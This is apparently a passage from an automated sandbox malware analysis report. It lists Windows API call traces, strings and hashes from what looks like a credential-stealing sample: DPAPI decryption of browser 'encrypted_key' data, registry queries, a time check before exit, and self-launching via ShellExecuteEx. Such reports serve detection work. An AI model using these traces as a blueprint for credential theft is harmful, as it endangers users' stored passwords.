                    • Associated: 00000000.00000002.1879542620.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1879542620.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1879542620.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: strtok_s$lstrcpylstrlen
                    • String ID:
                    • API String ID: 348468850-0
                    • Opcode ID: 157972442aab98f8943623bffcefb76fc7b802db09b007e8cca3bf4835712916
                    • Instruction ID: a77fe6eef144f8be1650d890f93c6b8163d42d0b0f361fe6991083760d0b9acb
                    • Opcode Fuzzy Hash: 157972442aab98f8943623bffcefb76fc7b802db09b007e8cca3bf4835712916
                    • Instruction Fuzzy Hash: 91517FB4A40209EFCB08CF95D595AEE77B5FF44308F10805AE802AB351D774EAD1CB95
                    APIs
                      • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                      • Part of subcall function 004099C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 004099EC
                      • Part of subcall function 004099C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00409A11
                      • Part of subcall function 004099C0: LocalAlloc.KERNEL32(00000040,?), ref: 00409A31
                      • Part of subcall function 004099C0: ReadFile.KERNEL32(000000FF,?,00000000,004102E7,00000000), ref: 00409A5A
                      • Part of subcall function 004099C0: LocalFree.KERNEL32(004102E7), ref: 00409A90
                      • Part of subcall function 004099C0: CloseHandle.KERNEL32(000000FF), ref: 00409A9A
                      • Part of subcall function 00418E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00418E52
                    • StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00409D39
                      • Part of subcall function 00409AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,N@,00000000,00000000), ref: 00409AEF
                      • Part of subcall function 00409AC0: LocalAlloc.KERNEL32(00000040,?,?,?,00404EEE,00000000,?), ref: 00409B01
                      • Part of subcall function 00409AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,N@,00000000,00000000), ref: 00409B2A
                      • Part of subcall function 00409AC0: LocalFree.KERNEL32(?,?,?,?,00404EEE,00000000,?), ref: 00409B3F
                    • memcmp.MSVCRT(?,DPAPI,00000005), ref: 00409D92
                      • Part of subcall function 00409B60: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00409B84
                      • Part of subcall function 00409B60: LocalAlloc.KERNEL32(00000040,00000000), ref: 00409BA3
                      • Part of subcall function 00409B60: memcpy.MSVCRT(?,?,?), ref: 00409BC6
                      • Part of subcall function 00409B60: LocalFree.KERNEL32(?), ref: 00409BD3
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1879542620.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.1879542620.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1879542620.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1879542620.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1879542620.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1879542620.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Local$Alloc$CryptFileFree$BinaryString$CloseCreateDataHandleReadSizeUnprotectlstrcpymemcmpmemcpy
                    • String ID: $"encrypted_key":"$DPAPI
                    • API String ID: 3731072634-738592651
                    • Opcode ID: 68f47abcc5eb6623e645a076bb0a9bdec2c93405b0c0c50e63f4af5dcb573e5c
                    • Instruction ID: 5ad523267ed72994677b79ea1d9dce7d7822fbf486e040e59600fa97cf483dfd
                    • Opcode Fuzzy Hash: 68f47abcc5eb6623e645a076bb0a9bdec2c93405b0c0c50e63f4af5dcb573e5c
                    • Instruction Fuzzy Hash: D53155B5D10109ABCB04EBE4DC85AEF77B8BF44304F14452AE915B7282E7389E04CBA5
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.1881130721.00000000040A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 040A0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_40a0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: CodeInfoPageValidmemset
                    • String ID:
                    • API String ID: 703783727-0
                    • Opcode ID: a2b74ec6b56f4fd1bb42d268d048981a4065a41abb9520184a3cb1684c992875
                    • Instruction ID: 8ce912bfb2b6a3c0cbbea398dcde354e4b5401b22da50113d40542c719704cc5
                    • Opcode Fuzzy Hash: a2b74ec6b56f4fd1bb42d268d048981a4065a41abb9520184a3cb1684c992875
                    • Instruction Fuzzy Hash: D231E930A0C291DAF7658F74CC542F97FE09B45315B0841AED8D2EF191D278E405D7D9
                    APIs
                    • GetSystemTime.KERNEL32(?), ref: 040B6BD3
                    • sscanf.NTDLL ref: 040B6C00
                    • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 040B6C19
                    • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 040B6C27
                    • ExitProcess.KERNEL32 ref: 040B6C41
                    Memory Dump Source
                    • Source File: 00000000.00000002.1881130721.00000000040A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 040A0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_40a0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Time$System$File$ExitProcesssscanf
                    • String ID:
                    • API String ID: 2533653975-0
                    • Opcode ID: aadf5676f7027d7b9e1150d64898f7b292d6df214c2b0f712edb9653bf63e1a7
                    • Instruction ID: 6f71091dbe6cec70548dfeda061be9c758d067e00736cdd836620c2d3115940c
                    • Opcode Fuzzy Hash: aadf5676f7027d7b9e1150d64898f7b292d6df214c2b0f712edb9653bf63e1a7
                    • Instruction Fuzzy Hash: 4B21E7B5D14208ABDF08EFE4D9459EEB7B6FF48304F04852EE406B3250EB356604CBA9
                    APIs
                    • GetProcessHeap.KERNEL32(00000000,00000104), ref: 040B809E
                    • RtlAllocateHeap.NTDLL(00000000), ref: 040B80A5
                    • RegOpenKeyExA.ADVAPI32(80000002,0064A1D4,00000000,00020119,?), ref: 040B80C5
                    • RegQueryValueExA.ADVAPI32(?,0064A4EC,00000000,00000000,000000FF,000000FF), ref: 040B80E6
                    • RegCloseKey.ADVAPI32(?), ref: 040B80F9
                    Memory Dump Source
                    • Source File: 00000000.00000002.1881130721.00000000040A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 040A0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_40a0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Heap$AllocateCloseOpenProcessQueryValue
                    • String ID:
                    • API String ID: 3225020163-0
                    • Opcode ID: f2207629c624761bbe8885f03498d73c435f9e088398b1cc221a346ec08661e3
                    • Instruction ID: 96c5565af416776a8a6e4d922ae1c30666a96633a0e9cbd333cdca9160e386e4
                    • Opcode Fuzzy Hash: f2207629c624761bbe8885f03498d73c435f9e088398b1cc221a346ec08661e3
                    • Instruction Fuzzy Hash: B4116DB6A84209BBD710DFD4DC4AFAFB7BDEB45700F008119F615A7290D77468008BA2
                    APIs
                    • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00417E37
                    • HeapAlloc.KERNEL32(00000000), ref: 00417E3E
                    • RegOpenKeyExA.ADVAPI32(80000002,024BA200,00000000,00020119,?), ref: 00417E5E
                    • RegQueryValueExA.ADVAPI32(?,024EBF70,00000000,00000000,000000FF,000000FF), ref: 00417E7F
                    • RegCloseKey.ADVAPI32(?), ref: 00417E92
                    Memory Dump Source
                    • Source File: 00000000.00000002.1879542620.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.1879542620.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1879542620.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1879542620.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1879542620.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1879542620.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Heap$AllocCloseOpenProcessQueryValue
                    • String ID:
                    • API String ID: 3466090806-0
                    • Opcode ID: f2207629c624761bbe8885f03498d73c435f9e088398b1cc221a346ec08661e3
                    • Instruction ID: f35b37edc560d93cca1bbeb044924e1a71a0ba88b9c12cde0d27c4035fcf8d53
                    • Opcode Fuzzy Hash: f2207629c624761bbe8885f03498d73c435f9e088398b1cc221a346ec08661e3
                    • Instruction Fuzzy Hash: 01114CB5A84205FFD710CFD4DD4AFBBBBB9EB09B10F10425AF605A7280D77858018BA6
                    APIs
                    • GetProcessHeap.KERNEL32(00000000,00000104), ref: 040B799B
                    • RtlAllocateHeap.NTDLL(00000000), ref: 040B79A2
                    • RegOpenKeyExA.ADVAPI32(80000002,0064A398,00000000,00020119,040B7920), ref: 040B79C2
                    • RegQueryValueExA.ADVAPI32(040B7920,00420AAC,00000000,00000000,?,000000FF), ref: 040B79E1
                    • RegCloseKey.ADVAPI32(040B7920), ref: 040B79EB
                    Memory Dump Source
                    • Source File: 00000000.00000002.1881130721.00000000040A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 040A0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_40a0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Heap$AllocateCloseOpenProcessQueryValue
                    • String ID:
                    • API String ID: 3225020163-0
                    • Opcode ID: 43a46ff31c4728249bb55ffe5b6c0263db84e810ad24588de6037cbf7116cf65
                    • Instruction ID: e4cadee69631d521f2e95121bee0af9410f6813621c68f5cf0e0faa3361d2e94
                    • Opcode Fuzzy Hash: 43a46ff31c4728249bb55ffe5b6c0263db84e810ad24588de6037cbf7116cf65
                    • Instruction Fuzzy Hash: A40144B9A40308FFEB10DFE0DC49FAEB7B9EB44705F104159FA05A7280D67465008F91
                    APIs
                    • StrStrA.SHLWAPI(024EBD08,?,?,?,0041140C,?,024EBD08,00000000), ref: 0041926C
                    • lstrcpyn.KERNEL32(0064AB88,024EBD08,024EBD08,?,0041140C,?,024EBD08), ref: 00419290
                    • lstrlenA.KERNEL32(?,?,0041140C,?,024EBD08), ref: 004192A7
                    • wsprintfA.USER32 ref: 004192C7
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1879542620.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.1879542620.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1879542620.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1879542620.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1879542620.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1879542620.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: lstrcpynlstrlenwsprintf
                    • String ID: %s%s
                    • API String ID: 1206339513-3252725368
                    • Opcode ID: bda2825dd20141c14e66db048f7389e73ec0fb40efc247105e9df97f2adce381
                    • Instruction ID: a59194731e19cd62a1114d9db51b1d7a77f87ed08144ed5303bdb74f02b8d175
                    • Opcode Fuzzy Hash: bda2825dd20141c14e66db048f7389e73ec0fb40efc247105e9df97f2adce381
                    • Instruction Fuzzy Hash: FD010879580108FFCB04DFECC998EAE7BBAEB49394F108548F9098B300C635AA40DB95
                    APIs
                    • GetProcessHeap.KERNEL32(00000000,00000104), ref: 040A151B
                    • RtlAllocateHeap.NTDLL(00000000), ref: 040A1522
                    • RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 040A153E
                    • RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 040A155C
                    • RegCloseKey.ADVAPI32(?), ref: 040A1566
                    Memory Dump Source
                    • Source File: 00000000.00000002.1881130721.00000000040A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 040A0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_40a0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Heap$AllocateCloseOpenProcessQueryValue
                    • String ID:
                    • API String ID: 3225020163-0
                    • Opcode ID: fa554e1047db5fd5a59fe71b1bc1fc144662bff3d722b2db7a38c4cdc39b2b47
                    • Instruction ID: 657df05b0dc9b644e4283646bca094419e6f485499820d88abc285ef9b7903a5
                    • Opcode Fuzzy Hash: fa554e1047db5fd5a59fe71b1bc1fc144662bff3d722b2db7a38c4cdc39b2b47
                    • Instruction Fuzzy Hash: D0011DBDA40208BFDB10DFE0DC49FAEB7BDEB48701F008159FA0597280D674AA018F91
                    APIs
                    • GetProcessHeap.KERNEL32(00000000,00000104,80000001), ref: 004012B4
                    • HeapAlloc.KERNEL32(00000000), ref: 004012BB
                    • RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 004012D7
                    • RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,000000FF,000000FF), ref: 004012F5
                    • RegCloseKey.ADVAPI32(?), ref: 004012FF
                    Memory Dump Source
                    • Source File: 00000000.00000002.1879542620.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.1879542620.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1879542620.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1879542620.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1879542620.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1879542620.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Heap$AllocCloseOpenProcessQueryValue
                    • String ID:
                    • API String ID: 3466090806-0
                    • Opcode ID: fa554e1047db5fd5a59fe71b1bc1fc144662bff3d722b2db7a38c4cdc39b2b47
                    • Instruction ID: a780f69aac564b2d92452564e57f3177c1920ebdf93c56c18a8360c70aaf8c3d
                    • Opcode Fuzzy Hash: fa554e1047db5fd5a59fe71b1bc1fc144662bff3d722b2db7a38c4cdc39b2b47
                    • Instruction Fuzzy Hash: 000131BDA40208BFDB10DFE0DC49FAEB7BDEB48701F008159FA05A7280D6749A018F51
                    APIs
                    • __getptd.LIBCMT ref: 040BC9B5
                      • Part of subcall function 040BC206: __getptd_noexit.LIBCMT ref: 040BC209
                      • Part of subcall function 040BC206: __amsg_exit.LIBCMT ref: 040BC216
                    • __getptd.LIBCMT ref: 040BC9CC
                    • __amsg_exit.LIBCMT ref: 040BC9DA
                    • __lock.LIBCMT ref: 040BC9EA
                    • __updatetlocinfoEx_nolock.LIBCMT ref: 040BC9FE
                    Memory Dump Source
                    • Source File: 00000000.00000002.1881130721.00000000040A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 040A0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_40a0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
                    • String ID:
                    • API String ID: 938513278-0
                    • Opcode ID: 82266bfdd90354e846418a99e827ba5feeba1708c4c917e9cb387fe0226bacf2
                    • Instruction ID: b4a11c7d6be46aef2f56712529e079aa66b84805e8d0ea0af989861a2ead82bb
                    • Opcode Fuzzy Hash: 82266bfdd90354e846418a99e827ba5feeba1708c4c917e9cb387fe0226bacf2
                    • Instruction Fuzzy Hash: B5F06D32A487119BF761BBA8980ABDD33A0AF0072CF14015ED8D4B66D0DB647541DBDE
                    APIs
                    • __getptd.LIBCMT ref: 0041C74E
                      • Part of subcall function 0041BF9F: __getptd_noexit.LIBCMT ref: 0041BFA2
                      • Part of subcall function 0041BF9F: __amsg_exit.LIBCMT ref: 0041BFAF
                    • __getptd.LIBCMT ref: 0041C765
                    • __amsg_exit.LIBCMT ref: 0041C773
                    • __lock.LIBCMT ref: 0041C783
                    • __updatetlocinfoEx_nolock.LIBCMT ref: 0041C797
                    Memory Dump Source
                    • Source File: 00000000.00000002.1879542620.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.1879542620.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1879542620.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1879542620.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1879542620.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1879542620.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
                    • String ID:
                    • API String ID: 938513278-0
                    • Opcode ID: efdb286082815a34fe65cdf39a39efb78846e04f1ab798c9691acb082f02800f
                    • Instruction ID: 747b7d94d78dcab7bc4ad9ba185e37b4c367e78d81b7dca89f1d9f587bf674ed
                    • Opcode Fuzzy Hash: efdb286082815a34fe65cdf39a39efb78846e04f1ab798c9691acb082f02800f
                    • Instruction Fuzzy Hash: EBF09632A817119BD7207BB95C467DE33A09F00728F24414FF414A62D2CBAC59D29E9E
                    APIs
                    • StrCmpCA.SHLWAPI(00000000,024E9220), ref: 0041079A
                    • StrCmpCA.SHLWAPI(00000000,024E9130), ref: 00410866
                    • StrCmpCA.SHLWAPI(00000000,024E9290), ref: 0041099D
                      • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1879542620.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.1879542620.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1879542620.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1879542620.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1879542620.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1879542620.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: lstrcpy
                    • String ID: `_A
                    • API String ID: 3722407311-2339250863
                    • Opcode ID: adf29671ce65ade073c3051981e201f5f0d13682d3ba44de7957ea85e479774a
                    • Instruction ID: 94d948ae3f98129d28702617e668470e7ead908e0178ded6cd69974dbc9b1d9a
                    • Opcode Fuzzy Hash: adf29671ce65ade073c3051981e201f5f0d13682d3ba44de7957ea85e479774a
                    • Instruction Fuzzy Hash: 3991C975A101089FCB28EF65D991BED77B5FF94304F40852EE8099F281DB349B46CB86
                    APIs
                    • StrCmpCA.SHLWAPI(00000000,024E9220), ref: 0041079A
                    • StrCmpCA.SHLWAPI(00000000,024E9130), ref: 00410866
                    • StrCmpCA.SHLWAPI(00000000,024E9290), ref: 0041099D
                      • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1879542620.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.1879542620.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1879542620.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1879542620.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1879542620.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1879542620.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: lstrcpy
                    • String ID: `_A
                    • API String ID: 3722407311-2339250863
                    • Opcode ID: 81950366ffcbbcdde432f001d7dc92a417181035050c38d9f2a7a554d623803e
                    • Instruction ID: eaeb4c1bfeb24d12610814888c89f1e8d39eb2be5be33b2b9933dc38047eb686
                    • Opcode Fuzzy Hash: 81950366ffcbbcdde432f001d7dc92a417181035050c38d9f2a7a554d623803e
                    • Instruction Fuzzy Hash: 6081BA75B101049FCB18EF65C991AEDB7B6FF94304F50852EE8099F281DB349B46CB86
                    APIs
                    • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,0000003C,?,000003E8), ref: 040B68CA
                      • Part of subcall function 040BA9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 040BA9EF
                      • Part of subcall function 040BAC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FB4,00420E17), ref: 040BAC2C
                      • Part of subcall function 040BAC17: lstrcpy.KERNEL32(00000000), ref: 040BAC6B
                      • Part of subcall function 040BAC17: lstrcat.KERNEL32(00000000,00000000), ref: 040BAC79
                      • Part of subcall function 040BAB07: lstrcpy.KERNEL32(?,00420E17), ref: 040BAB6C
                    • ShellExecuteEx.SHELL32(0000003C), ref: 040B698D
                    • ExitProcess.KERNEL32 ref: 040B69BC
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1881130721.00000000040A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 040A0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_40a0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: lstrcpy$ExecuteExitFileModuleNameProcessShelllstrcatlstrlen
                    • String ID: <
                    • API String ID: 1148417306-4251816714
                    • Opcode ID: 4ae30b859fc942c9587f152936d11ec8aa2d9d08854ccb4cb357e31b47128d92
                    • Instruction ID: 4c6abe60d9bd2103bc5cf1089bc35b8569d73fced2b0a9ff0185ee9c7393d3b0
                    • Opcode Fuzzy Hash: 4ae30b859fc942c9587f152936d11ec8aa2d9d08854ccb4cb357e31b47128d92
                    • Instruction Fuzzy Hash: 89314FB1901218ABEB14EBA0DD95FDEB779AF44308F404189E34576190DF747B88CF99
                    APIs
                    • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,0000003C,?,000003E8), ref: 00416663
                      • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                      • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                      • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                      • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                      • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                    • ShellExecuteEx.SHELL32(0000003C), ref: 00416726
                    • ExitProcess.KERNEL32 ref: 00416755
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1879542620.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.1879542620.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1879542620.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1879542620.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1879542620.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1879542620.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: lstrcpy$ExecuteExitFileModuleNameProcessShelllstrcatlstrlen
                    • String ID: <
                    • API String ID: 1148417306-4251816714
                    • Opcode ID: b4cd0edc391b5ae1f7ca76f0c70161f1b78b8fd1119a06bee71e5bdfafbbf1ad
                    • Instruction ID: 5b5f5c47f0bfa9475b258acd8296b8f4f2330d650783268263d73b7fdd640aa3
                    • Opcode Fuzzy Hash: b4cd0edc391b5ae1f7ca76f0c70161f1b78b8fd1119a06bee71e5bdfafbbf1ad
                    • Instruction Fuzzy Hash: 7F314AB1C01208ABDB14EB91DD82FDEB778AF04314F40518EF20966191DF786B89CF6A
                    APIs
                    • VirtualProtect.KERNEL32(?,?,@Jn@,@Jn@), ref: 00406C9F
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1879542620.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.1879542620.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1879542620.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1879542620.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1879542620.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1879542620.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: ProtectVirtual
                    • String ID: @Jn@$Jn@$Jn@
                    • API String ID: 544645111-1180188686
                    • Opcode ID: caf630da144662436c325b164354e3ce96217d6286d52214ffa948e93cb1361e
                    • Instruction ID: b746c2a28f05bbd6b1460d210bf7098c9bc173f160aa6dfc6dfdc57a011f18e7
                    • Opcode Fuzzy Hash: caf630da144662436c325b164354e3ce96217d6286d52214ffa948e93cb1361e
                    • Instruction Fuzzy Hash: FA213374E04208EFEB04CF84C544BAEBBB5FF48304F1181AAD54AAB381D3399A91DF85
                    APIs
                    • lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                    • lstrcatA.KERNEL32(00000000), ref: 0041A982
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1879542620.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.1879542620.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1879542620.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1879542620.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1879542620.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1879542620.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: lstrcatlstrcpy
                    • String ID: vI@$vI@
                    • API String ID: 3905823039-1245421781
                    • Opcode ID: 944da6e453fcb66f0d11250dd24ec57f51aa285ffba2b214b4798455d692dd31
                    • Instruction ID: 271a46469eabd2290b2e3c410fce444a88fb87627d9bf606efbbe474ae7d75ee
                    • Opcode Fuzzy Hash: 944da6e453fcb66f0d11250dd24ec57f51aa285ffba2b214b4798455d692dd31
                    • Instruction Fuzzy Hash: F011E878901108EFCB05EF94D885AEEB3B5FF49314F108599E825AB391C734AE92CF95
                    APIs
                    • GetProcessHeap.KERNEL32(00000000,000000FA,?,?,0041951E,00000000), ref: 00418D5B
                    • HeapAlloc.KERNEL32(00000000,?,?,0041951E,00000000), ref: 00418D62
                    • wsprintfW.USER32 ref: 00418D78
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1879542620.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.1879542620.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1879542620.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1879542620.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1879542620.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
